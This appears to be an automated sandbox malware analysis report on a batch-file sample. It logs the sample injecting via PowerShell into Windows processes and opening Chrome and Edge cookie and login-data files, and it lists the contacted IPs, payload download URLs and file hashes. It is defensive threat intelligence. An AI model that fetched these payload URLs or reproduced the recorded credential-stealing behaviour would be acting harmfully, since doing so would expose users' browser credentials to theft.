Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: NULL target: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 2930000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe base: 17FB04			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Windows Analysis Report Ordine_doc_419024001904.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Ordine_doc_419024001904.bat

Malware Threat Intel
Provided by

IP	Domain	Country	ASN	ASN Name	Malicious
87.121.105.163	unknown	Bulgaria	43561	NET1-ASBG	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
47.91.88.207	www.tyaer.com	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Name	Malicious	Reputation
http://87.121.105.163/Skabs.asd	false	unknown
http://www.oyoing.com/gnbc/	true	unknown
http://87.121.105.163/icjFpYDkBweqyeZ252.bin	false	unknown
http://www.tyaer.com/gnbc/?5b=L9JeOsoYfW7LuiHaclFiXmHOc0YYKxwC8gDNcZo86ZNgoJ0Ky4PaH7PNod07P46PC5yTK57EcxKk26T8ts7dcr46kIfYIZ8tiScezyY+sUlmUz9chnLJzCyoHk2LugWc+g==&wD=mjvh1V4x	true	unknown

ID:	1428795
Product:	CloudBasic
Start time:	16:11:07
Start date:	19.04.2024
Sample:	Ordine_doc_419024001904.bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	fc2d2d71c178fe702dac6ef8f4ab3e03
SHA1:	b2f0157962e4d04966a6348836a07db25dad4833
SHA256:	3d252afaaec1a738e31fe9138e502fcd31a32f388cc55f9aca003ecad30e97b4

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	3A925CB766CE4286E251C26E90B55CE8	3FA8EE6E901101A4661723B94D6C9309E281BD28	4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bu3bio23.1v3.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsfzwus5.lv0.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwgajo4p.34g.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyuf5eoi.3xc.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\s5497I81	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8	D87270D0039ED3A5A72E7082EA71E305	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)	data	9E9BA7FD55E5054DA91E5ED1E77015BD	F49D1E7A93874172DC24CC91973D57AD87BAB36D	533063379C05353BC2BEB32BC58C0FEA9F1C3D019AC0F13B3AC7F9899468EABB
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DN32P3HNCG519VXTW9UR.temp	data	9E9BA7FD55E5054DA91E5ED1E77015BD	F49D1E7A93874172DC24CC91973D57AD87BAB36D	533063379C05353BC2BEB32BC58C0FEA9F1C3D019AC0F13B3AC7F9899468EABB
C:\Users\user\AppData\Roaming\Specificerings.Lit	ASCII text, with very long lines (65536), with no line terminators	936712FC1C7820D9DFC20A3B396785A2	1755DAD431968257CD5F1C2E0E045C656BCE8C4D	0E44BE6E4754A93A4FA5707784A47226CC458C8432A469C092CC5B1C063BBFAD